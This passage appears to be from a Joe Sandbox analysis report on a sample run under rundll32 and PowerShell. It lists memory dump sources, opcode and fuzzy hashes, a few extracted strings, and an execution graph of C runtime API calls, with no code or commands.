                                                                                                                                                            • Instruction ID: c9329b3066cdf019f71ee6ff7682cba430baa5b0038f1047f73c35215a6b3082
                                                                                                                                                            • Opcode Fuzzy Hash: 87037db80959730822e13737bc506a015fa0ef260011d235b2ab8439cead5ee3
                                                                                                                                                            • Instruction Fuzzy Hash: 8031C4747103349FDB0A5B78D81476E7EABEBC9742F10406AA609A7399CF3C0D8197A1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4ddf5572c9eef1b78266724dcfa558013b3d31eb031686bfa8fd11a6e9428b0f
                                                                                                                                                            • Instruction ID: 19bd088a9f48f561f087a7bb66399ee72e39930d4ac5fb28e2ab0f306183f97a
                                                                                                                                                            • Opcode Fuzzy Hash: 4ddf5572c9eef1b78266724dcfa558013b3d31eb031686bfa8fd11a6e9428b0f
                                                                                                                                                            • Instruction Fuzzy Hash: 98410B74E00219DFCB48DFA8E88499DBBF6FF58301B104569E915AB364DB346D41CF50
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2b5842082fa7df56e72a2358efa187399981ebe821f96cb01ba4b1d926c18864
                                                                                                                                                            • Instruction ID: ecc9b580778e1e274bb36964f0cfaab9449f252631518631f177cd7676e0d302
                                                                                                                                                            • Opcode Fuzzy Hash: 2b5842082fa7df56e72a2358efa187399981ebe821f96cb01ba4b1d926c18864
                                                                                                                                                            • Instruction Fuzzy Hash: BD412C74E00229DFCB48DFA9E88499DBBF6FF58301B108569E915AB324DB34AD41CF50
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5cda96d458202a140baae05d84998bc9823995de39c97be4591aec4bb6b11382
                                                                                                                                                            • Instruction ID: 8549771f11dd75392c3f4a68fe09dda29641acd5e746e2f5570bda2f612f9c8d
                                                                                                                                                            • Opcode Fuzzy Hash: 5cda96d458202a140baae05d84998bc9823995de39c97be4591aec4bb6b11382
                                                                                                                                                            • Instruction Fuzzy Hash: AF21E5356042648FDB14EB68D4547DE7BF2AF88305F10056DD04EAB391CBBAAD45CBA1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7f5a76e7db82d33cddf3d6673c9bc8019373a8944462f007398380af7631d44c
                                                                                                                                                            • Instruction ID: 0c9d0c7602c728d49a3e7211c2d7818a3b3b2cbb94cd666daed7fbe8407c92be
                                                                                                                                                            • Opcode Fuzzy Hash: 7f5a76e7db82d33cddf3d6673c9bc8019373a8944462f007398380af7631d44c
                                                                                                                                                            • Instruction Fuzzy Hash: F121B3306042648FDB14EB68C45479EBBF2AF89305F00056DD14AAB3A1DFBAAD45CBA1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2601426588.000000000347D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0347D000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_347d000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4b4d1ca7733f79a5788f0ccc617a1114573b19383f97caeee82162c7e2dd1812
                                                                                                                                                            • Instruction ID: e21843672d4d644cc235de9fa0bc8d9565992d6050f66d884707cd15c87f8a6b
                                                                                                                                                            • Opcode Fuzzy Hash: 4b4d1ca7733f79a5788f0ccc617a1114573b19383f97caeee82162c7e2dd1812
                                                                                                                                                            • Instruction Fuzzy Hash: 301106B0D143809EDB10DF24D984B66BBA9EF85218F248A6ED50A4F341C23AD447C665
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2601426588.000000000347D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0347D000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_347d000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 62145174c05083ebadb245b4893719c7b0517a24a570e77cb83455cd2e3b3c9e
                                                                                                                                                            • Instruction ID: ca7850fd449254e912b8ac303274e2908ca39017868741f66e060f6fe81259ca
                                                                                                                                                            • Opcode Fuzzy Hash: 62145174c05083ebadb245b4893719c7b0517a24a570e77cb83455cd2e3b3c9e
                                                                                                                                                            • Instruction Fuzzy Hash: C51194719093C08FD712DF24D594755BF71EF46218F2985EBC4898F693C33A944AC762
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f5a68f55a31a30c4db23c4397343dbd2e65c4b1d920f5a6217a97a5c95972604
                                                                                                                                                            • Instruction ID: 6db5b2d8fb85fab691165afec460afd7a736368ef828697d7c3c7a922ebd2c78
                                                                                                                                                            • Opcode Fuzzy Hash: f5a68f55a31a30c4db23c4397343dbd2e65c4b1d920f5a6217a97a5c95972604
                                                                                                                                                            • Instruction Fuzzy Hash: E9118270504396CFDB04EB28D4447DABBB2AB10349F14499DD1485F282DBBAA94BCBD1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2d8756cb865f8ffe5a5b9d8da5321ac2b4e28fd936e17d0f6c400bd50b3a37c5
                                                                                                                                                            • Instruction ID: 75fa193a76106c7b3624e6bf85ea1f6e3f18c9d8a3a39490a9a7b4c79f6c8e8b
                                                                                                                                                            • Opcode Fuzzy Hash: 2d8756cb865f8ffe5a5b9d8da5321ac2b4e28fd936e17d0f6c400bd50b3a37c5
                                                                                                                                                            • Instruction Fuzzy Hash: 6CF0EC31745314DFDF1555289C297587F51EB84326F060096E21C8F1E6C664784D8250
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e4ddf6330eddbb1bc13801ef558274831555b5f4b7f41cfcd8c0be5a2372f0ba
                                                                                                                                                            • Instruction ID: 48acdad76d8cc7000ee2e53fdf280e920aee05a9d5e1aea556ff74fda7acef89
                                                                                                                                                            • Opcode Fuzzy Hash: e4ddf6330eddbb1bc13801ef558274831555b5f4b7f41cfcd8c0be5a2372f0ba
                                                                                                                                                            • Instruction Fuzzy Hash: D9E02630B400208FC700DB3CD444AE833E6EF8420531649E1E845DB33ADA35DC118BC0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 739a722e4684e0850416c2e22e32ba48eec5f0e6bc9fc9d88740b63daf4e3b5e
                                                                                                                                                            • Instruction ID: c16be62e6d12034934aa176fe75b557a32123ebe59d7f280e82a76702f5d36b6
                                                                                                                                                            • Opcode Fuzzy Hash: 739a722e4684e0850416c2e22e32ba48eec5f0e6bc9fc9d88740b63daf4e3b5e
                                                                                                                                                            • Instruction Fuzzy Hash: 1FE09B303047A44EDB21E774940038DB7E29F41319F00096DC14A5B641CBB7794487A2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ea18bda7fb0f274c5b2264c1b758217adc6801d56f23528bee0aeef2223900ac
                                                                                                                                                            • Instruction ID: 671a4a838ffda7b5a3af84070339d3bd946a55c9712852cc8e03bfba45622953
                                                                                                                                                            • Opcode Fuzzy Hash: ea18bda7fb0f274c5b2264c1b758217adc6801d56f23528bee0aeef2223900ac
                                                                                                                                                            • Instruction Fuzzy Hash: 8AD0C232200108ABCB043B59E40885E7BAFEBC42217018026F50AA7380CE344D0587D0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 875a791870643afd9b48fb87bbd299deda83273d8c6fadb9130718555c1d14fb
                                                                                                                                                            • Instruction ID: 4f667c77f012fdb8cc1ac0004dc850698b09660d9b04dfec569f6d6f32e00838
                                                                                                                                                            • Opcode Fuzzy Hash: 875a791870643afd9b48fb87bbd299deda83273d8c6fadb9130718555c1d14fb
                                                                                                                                                            • Instruction Fuzzy Hash: 05D0A931B002308FCB44EB7DE4088AA73EEAF8856031148A1EA09DB328EE75DC1047C0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000011.00000002.1914853901.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_17_2_7b00000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'dq$4'dq$Cl$Cl
                                                                                                                                                            • API String ID: 0-2891603558
                                                                                                                                                            • Opcode ID: 836b177ea5d415a982687e7f6f523c720d03b2c76546d8d358fd324b0bcb75a6
                                                                                                                                                            • Instruction ID: 2f1329638ddb9ef983d3afe1d5485445fb1afb320e687f9a558dc00741cd0cfb
                                                                                                                                                            • Opcode Fuzzy Hash: 836b177ea5d415a982687e7f6f523c720d03b2c76546d8d358fd324b0bcb75a6
                                                                                                                                                            • Instruction Fuzzy Hash: 813147F17112068BEF2476759461BBEBFA2EFC6251F5080AAD846CA1C1DF35D581C3E2
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000011.00000002.1914853901.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_17_2_7b00000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $dq$$dq$$dq
                                                                                                                                                            • API String ID: 0-2861643491
                                                                                                                                                            • Opcode ID: c02bbf0500cd0c4a159058cf966258baa82cd1bdbec48eaba570e23ccd6362a3
                                                                                                                                                            • Instruction ID: 9c80c07a2eab74b67a7516abf56b2b96a263fba08f6a090e46b323f21ea4aa9e
                                                                                                                                                            • Opcode Fuzzy Hash: c02bbf0500cd0c4a159058cf966258baa82cd1bdbec48eaba570e23ccd6362a3
                                                                                                                                                            • Instruction Fuzzy Hash: E55103F5710306DFEB24AA64C815BBA7BA2EB84351F1084A9E9058F2C1DF35DD81CBD1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000011.00000002.1886800608.000000000330D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0330D000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_17_2_330d000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 24b68dc3cc302fda53e04257e6c339c48f02568890102969c7d9aece615c0e71
                                                                                                                                                            • Instruction ID: eaf5cabaf959ed020f13a5981de65c68c930712c645a5bd04d4e33df90b53491
                                                                                                                                                            • Opcode Fuzzy Hash: 24b68dc3cc302fda53e04257e6c339c48f02568890102969c7d9aece615c0e71
                                                                                                                                                            • Instruction Fuzzy Hash: E901DB71509340AAE7208AA9CEC4B66BFDCEF51325F0CC55AED4C0A6C2C67C9842CAB5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000011.00000002.1886800608.000000000330D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0330D000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_17_2_330d000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e4b5e99c35b010759fc2fda813bb1580a7e7e5528b53297003de76dc8536b6d8
                                                                                                                                                            • Instruction ID: 3515d97e50ac5c509c794e68e0133f79e8bce87d82aaea26513558d5a1781269
                                                                                                                                                            • Opcode Fuzzy Hash: e4b5e99c35b010759fc2fda813bb1580a7e7e5528b53297003de76dc8536b6d8
                                                                                                                                                            • Instruction Fuzzy Hash: 5A012D7240E3C09FD7128B258D94B52BFB4DF53224F1D81CBD9888F1A3C2695849C772
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000011.00000002.1887257375.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_17_2_4be0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4e4b9b37ba94387649ac5488aa36fc3b760021dd18fe04847d95b519400c8097
                                                                                                                                                            • Instruction ID: 8c4998d6eada66ae078de0b0513dad9b4049d39313d47843da09b913510b8746
                                                                                                                                                            • Opcode Fuzzy Hash: 4e4b9b37ba94387649ac5488aa36fc3b760021dd18fe04847d95b519400c8097
                                                                                                                                                            • Instruction Fuzzy Hash: 29F0B735A001059FCB15CB9DD890AEEF7B5FF88324F248199E515A72A1C736A852CB51
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000011.00000002.1914853901.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_17_2_7b00000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'dq$4'dq$$dq$$dq
                                                                                                                                                            • API String ID: 0-4229963660
                                                                                                                                                            • Opcode ID: 2e1928175af007989314fc702446c594dafa2e4c06a8f6f4f9a1ec3f7a2c8af1
                                                                                                                                                            • Instruction ID: 027db0397e137a5ac677a63c517f085c4cb9d52d3d15363172b37daad1331b00
                                                                                                                                                            • Opcode Fuzzy Hash: 2e1928175af007989314fc702446c594dafa2e4c06a8f6f4f9a1ec3f7a2c8af1
                                                                                                                                                            • Instruction Fuzzy Hash: 6801F99170D3D64FC727626854203566FB29F8761072A40DBC885DF2D3CE144D46C3E7
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000013.00000002.1933585023.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_19_2_6f50000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'dq$4'dq$Cl$Cl
                                                                                                                                                            • API String ID: 0-2891603558
                                                                                                                                                            • Opcode ID: 5b0792184f5d6286b861eff2a87363cc98e59879cf7c82ff1584adea0b826411
                                                                                                                                                            • Instruction ID: deab0b183ed1f22f00b5529e552b99d8ce54d82a697566c91536a6e5389168db
                                                                                                                                                            • Opcode Fuzzy Hash: 5b0792184f5d6286b861eff2a87363cc98e59879cf7c82ff1584adea0b826411
                                                                                                                                                            • Instruction Fuzzy Hash: F3315B31F112058BDFA46A7894117BEB792BBC5351F55803ADE468A1C1DF35CD81C3A2
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000013.00000002.1933585023.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_19_2_6f50000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $dq$$dq$$dq
                                                                                                                                                            • API String ID: 0-2861643491
                                                                                                                                                            • Opcode ID: bf25a286ea03f2f49e110afd27a962797761aa11fdbd21e75270fb8ac1d89733
                                                                                                                                                            • Instruction ID: 023ffc165af6e6bc5b928fecb2c3d0ab0d372d7fb2eb1fd4a7dc99b9ba6d1eae
                                                                                                                                                            • Opcode Fuzzy Hash: bf25a286ea03f2f49e110afd27a962797761aa11fdbd21e75270fb8ac1d89733
                                                                                                                                                            • Instruction Fuzzy Hash: AF510235B10209DFDBA49E64D811BBE7BA2AF84352F15C429EE058F291DF35DD80CBA1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000013.00000002.1895182843.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_19_2_840000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: bc1a1fb3c7edf0490bb654c9001b27bde9f6226e1d14752097157788cdc5357e
                                                                                                                                                            • Instruction ID: c2c76937655ad2b4b0e91456e869ef553a270ceab5ef4d76ba26bfb79f4ad02e
                                                                                                                                                            • Opcode Fuzzy Hash: bc1a1fb3c7edf0490bb654c9001b27bde9f6226e1d14752097157788cdc5357e
                                                                                                                                                            • Instruction Fuzzy Hash: 85A1AD74A04249CFCB16CF98C4949AEFBB1FF49310B25859AD855EB3A1C735EC81CBA0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000013.00000002.1895182843.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_19_2_840000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b329de7e1ce60178e9f96f0678bd245b92461a7839fc7b3dc6ae6ad1835c5d7d
                                                                                                                                                            • Instruction ID: 024b8a339af1539f17d732e75eea807012a9c6da65eda095f2eb9fef3e695f13
                                                                                                                                                            • Opcode Fuzzy Hash: b329de7e1ce60178e9f96f0678bd245b92461a7839fc7b3dc6ae6ad1835c5d7d
                                                                                                                                                            • Instruction Fuzzy Hash: 4B411874A00509DFCB05CF58C4D89AEFBB1FF48324B558269D815AB365C736EC91CBA4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000013.00000002.1892071529.00000000005DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005DD000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_19_2_5dd000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b028d68a871e0b06843409d1460a0220555e71e3eca5e80c8b30ebfeac1aafa2
                                                                                                                                                            • Instruction ID: d449e43b58b0353ee092b81ca95f1d4fd2208a4581787a54104bc0fbef97c67b
                                                                                                                                                            • Opcode Fuzzy Hash: b028d68a871e0b06843409d1460a0220555e71e3eca5e80c8b30ebfeac1aafa2
                                                                                                                                                            • Instruction Fuzzy Hash: D501806200D3C09FD7624B258C88752BFB8EF53224F0985DBE8888F2A7D2685C45C772
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000013.00000002.1892071529.00000000005DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005DD000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_19_2_5dd000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c4bae40b428342976fd965a7becbb9102638c49c361f5e1627aa8e08c4eb4260
                                                                                                                                                            • Instruction ID: 79d3349ae8597b7779454f9c71116f22e17cd1c17dc9fd8c8c1891c9c1c593ef
                                                                                                                                                            • Opcode Fuzzy Hash: c4bae40b428342976fd965a7becbb9102638c49c361f5e1627aa8e08c4eb4260
                                                                                                                                                            • Instruction Fuzzy Hash: 2D01F7710043449AE7309A1DCCC8B66BFE8EF91325F18C81BEC080B342D6799841C6B1
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000013.00000002.1933585023.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_19_2_6f50000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'dq$4'dq$$dq$$dq
                                                                                                                                                            • API String ID: 0-4229963660
                                                                                                                                                            • Opcode ID: f044114103980cb122d6dce069c4a2bec245e200ac345f4edf4f17e8be1ed499
                                                                                                                                                            • Instruction ID: f083c48e54ec3632b08c1e3ec06b724b36b030e516bb334113dff86a4a5acae1
                                                                                                                                                            • Opcode Fuzzy Hash: f044114103980cb122d6dce069c4a2bec245e200ac345f4edf4f17e8be1ed499
                                                                                                                                                            • Instruction Fuzzy Hash: 5AF0F022F1E7A68FC76746286821112AFB26F8260133B41DBCD84DB2A2CE194D05C793

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:11.4%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                            Signature Coverage:8.8%
                                                                                                                                                            Total number of Nodes:657
                                                                                                                                                            Total number of Limit Nodes:10
                                                                                                                                                            execution_graph 12812 68c064b0 12813 68c064bd 12812->12813 12824 68c04216 12813->12824 12817 68c064e3 12818 68c04216 _free 14 API calls 12817->12818 12822 68c06509 12817->12822 12819 68c064fd 12818->12819 12821 68c04273 _free 14 API calls 12819->12821 12821->12822 12823 68c06515 12822->12823 12837 68c05a42 12822->12837 12829 68c04223 _free 12824->12829 12825 68c04263 12845 68c04203 12825->12845 12826 68c0424e RtlAllocateHeap 12827 68c04261 12826->12827 12826->12829 12831 68c04273 12827->12831 12829->12825 12829->12826 12842 68c05e35 12829->12842 12832 68c0427e HeapFree 12831->12832 12836 68c042a7 _free 12831->12836 12833 68c04293 12832->12833 12832->12836 12834 68c04203 _free 12 API calls 12833->12834 12835 68c04299 GetLastError 12834->12835 12835->12836 12836->12817 12838 68c05861 _free 5 API calls 12837->12838 12839 68c05a5e 12838->12839 12840 68c05a7c InitializeCriticalSectionAndSpinCount 12839->12840 12841 68c05a67 12839->12841 12840->12841 12841->12822 12848 68c05e62 12842->12848 12859 68c03dce GetLastError 12845->12859 12847 68c04208 12847->12827 12849 68c05e6e ___scrt_is_nonwritable_in_current_image 12848->12849 12854 68c03f0a EnterCriticalSection 12849->12854 12851 68c05e79 12855 68c05eb5 12851->12855 12854->12851 12858 68c03f52 LeaveCriticalSection 12855->12858 12857 68c05e40 12857->12829 12858->12857 12860 68c03deb 12859->12860 12861 68c03de5 12859->12861 12881 68c03df1 SetLastError 12860->12881 12887 68c05a00 12860->12887 12882 68c059c1 12861->12882 12865 68c04216 _free 12 API calls 12867 68c03e19 12865->12867 12868 68c03e21 12867->12868 12869 68c03e38 12867->12869 12871 68c05a00 _free 6 API calls 12868->12871 12870 68c05a00 _free 6 API calls 12869->12870 12872 68c03e44 12870->12872 12873 68c03e2f 12871->12873 12874 68c03e48 12872->12874 12875 68c03e59 12872->12875 12876 68c04273 _free 12 API calls 12873->12876 12877 68c05a00 _free 6 API calls 12874->12877 12892 68c03a79 12875->12892 12876->12881 12877->12873 12880 68c04273 _free 12 API calls 12880->12881 12881->12847 12897 68c05861 12882->12897 12884 68c059dd 12885 68c059e6 12884->12885 12886 68c059f8 TlsGetValue 12884->12886 12885->12860 12888 68c05861 _free 5 API calls 12887->12888 12889 68c05a1c 12888->12889 12890 68c03e09 12889->12890 12891 68c05a3a TlsSetValue 12889->12891 12890->12865 12890->12881 12910 68c0390d 12892->12910 12898 68c0588f 12897->12898 12902 68c0588b _free 12897->12902 12898->12902 12903 68c0579a 12898->12903 12901 68c058a9 GetProcAddress 12901->12902 12902->12884 12908 68c057ab ___vcrt_FlsFree 12903->12908 12904 68c057c9 LoadLibraryExW 12906 68c057e4 GetLastError 12904->12906 12904->12908 12905 68c05856 12905->12901 12905->12902 12906->12908 12907 68c0583f FreeLibrary 12907->12908 12908->12904 12908->12905 12908->12907 12909 68c05817 LoadLibraryExW 12908->12909 12909->12908 12911 68c03919 ___scrt_is_nonwritable_in_current_image 12910->12911 12924 68c03f0a EnterCriticalSection 12911->12924 12913 68c03923 12925 68c03953 12913->12925 12916 68c03a1f 12917 68c03a2b ___scrt_is_nonwritable_in_current_image 12916->12917 12929 68c03f0a EnterCriticalSection 12917->12929 12919 68c03a35 12930 68c03c00 12919->12930 12921 68c03a4d 12934 68c03a6d 12921->12934 12924->12913 12928 68c03f52 LeaveCriticalSection 12925->12928 12927 68c03941 12927->12916 12928->12927 12929->12919 12931 68c03c0f __fassign 12930->12931 12933 68c03c36 __fassign 12930->12933 12931->12933 12937 68c06958 12931->12937 12933->12921 13051 68c03f52 LeaveCriticalSection 12934->13051 12936 68c03a5b 12936->12880 12938 68c069d8 12937->12938 12941 68c0696e 12937->12941 12940 68c04273 _free 14 API calls 12938->12940 12963 68c06a26 12938->12963 12942 68c069fa 12940->12942 12941->12938 12945 68c069a1 12941->12945 12947 68c04273 _free 14 API calls 12941->12947 12943 68c04273 _free 14 API calls 12942->12943 12944 68c06a0d 12943->12944 12949 68c04273 _free 14 API calls 12944->12949 12950 68c04273 _free 14 API calls 12945->12950 12964 68c069c3 12945->12964 12946 68c04273 _free 14 API calls 12951 68c069cd 12946->12951 12953 68c06996 12947->12953 12948 68c06a34 12952 68c06a94 12948->12952 12961 68c04273 14 API calls _free 12948->12961 12955 68c06a1b 12949->12955 12956 68c069b8 12950->12956 12957 68c04273 _free 14 API calls 